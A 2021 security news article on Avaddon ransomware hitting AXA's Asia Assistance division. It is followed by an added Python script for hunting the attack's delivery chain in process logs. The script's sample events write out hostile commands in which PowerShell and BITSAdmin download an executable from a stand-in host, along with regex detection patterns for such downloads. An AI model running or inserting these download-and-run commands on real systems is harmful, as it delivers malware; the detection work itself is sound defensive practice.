UPDATED 20:35 EDT / MAY 16 2021

SECURITY

After dropping support for ransom payments, AXA struck by ransomware in Asia

French multinational insurance firm AXA S.A. has been struck by a ransomware attack after the company announced May 9 that it would no longer pay for ransomware payments.

Reuters reported the company said today that one of its Asia Assistance divisions had been targeted and that information technology services were affected in Thailand, Malaysia, Hong Kong and the Philippines. “As a result, certain data processed by Inter Partners Asia (IPA) in Thailand has been accessed,” AXA noted.

According to Hackread, the Avaddon ransomware group was behind the attack and is claiming responsibility on its dark web site. The group claims to have stolen 3 terabytes of data, including a long list of information: ID cards, passport copies, customer claims, reserved agreements, denied reimbursements, payments to customers, contract and reports, customer IDs and bank account scanned papers, hospital and doctor reserved material (private investigation for fraud) and customer medical reports including HIV, hepatitis, STD and other illness reports.

Avaddon provided copies of two passports as evidence, one Thai and the other from the U.K.

The ransom being demanded was not disclosed. The ransomware group said AXA has 240 hours to communicate and cooperate, otherwise it will leak valuable company documents.

The attack by Avaddon comes just under a week after both the U.S. Federal Bureau of Investigation and the Australian Cyber Security Centre issued warnings that an Avaddon campaign was targeting organizations worldwide. The FBI said that Avaddon ransomware affiliates are trying to breach the networks of manufacturing, healthcare and other private sector organizations, while the ACSC said that the targets included government, finance, law enforcement, energy, information technology and health.

“In addition to encryption of data, victims are threatened with the publication of stolen data, as well as Distributed Denial of Service against their network,” the ACSC added.

Avaddon dates to around June last year and was first detailed in July by Trend Micro Inc. Avaddon ransomware attacks are typically propagated through emails with a JavaScript attachment. Once the attachment is downloaded and run, it uses a PowerShell command and the BITSAdmin command-line tool to download and run the ransomware payload.

At this point, users have their wallpaper changed to an image that states that “all your files have been encrypted” and are told to read a ransomware note. The note provides instructions on how the affected users can recover their encrypted files.
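One way to hunt for the delivery chain described above, as an added example that is not from the original article or from Trend Micro: it flags PowerShell or BITSAdmin download commands whose ancestor process is a Windows script host running a .js file. The event records and their field names are constructed for illustration, and the assumption that the attachment runs under wscript.exe or cscript.exe is not stated in the article.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Constructed process-creation events; field names are hypothetical.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\IMG_0001.jpg.js"'},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c (New-Object Net.WebClient).DownloadFile("
                "'http://payload.example.invalid/a.exe','a.exe')"},
    {"pid": 220, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c bitsadmin /transfer job1 http://payload.example.invalid/a.exe a.exe"},
    {"pid": 221, "ppid": 220, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job1 http://payload.example.invalid/a.exe a.exe"},
    # Benign: an admin downloading from an interactive shell, no script host above it.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Invoke-WebRequest https://intranet.example.invalid/tool.zip -OutFile tool.zip"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # assumed handlers for .js attachments
DOWNLOAD_PATTERNS = {
    "powershell.exe": re.compile(
        r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I),
    "bitsadmin.exe": re.compile(r"/transfer\b", re.I),
}

def triage(events, max_hops=4):
    """Return (pid, reason) for download commands descended from a script host running .js."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = basename(e["image"]).lower()
        pattern = DOWNLOAD_PATTERNS.get(image)
        if not pattern or not pattern.search(e["cmdline"]):
            continue
        # Walk up the ancestry: cmd.exe often sits between the script host and the tool.
        parent, hops = by_pid.get(e["ppid"]), 0
        while parent and hops < max_hops:
            if (basename(parent["image"]).lower() in SCRIPT_HOSTS
                    and re.search(r"\.jse?\b", parent["cmdline"], re.I)):
                alerts.append((e["pid"], f"{image} download under script host pid {parent['pid']}"))
                break
            parent, hops = by_pid.get(parent["ppid"]), hops + 1
    return alerts

if __name__ == "__main__":
    for pid, reason in triage(EVENTS):
        print(pid, reason)
```

The same parent-child logic can be expressed as a rule in an EDR or SIEM over real process-creation telemetry; the ancestry walk matters because matching only the direct parent misses the BITSAdmin call launched through cmd.exe.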

Photo: Kokky92/Wikimedia Commons
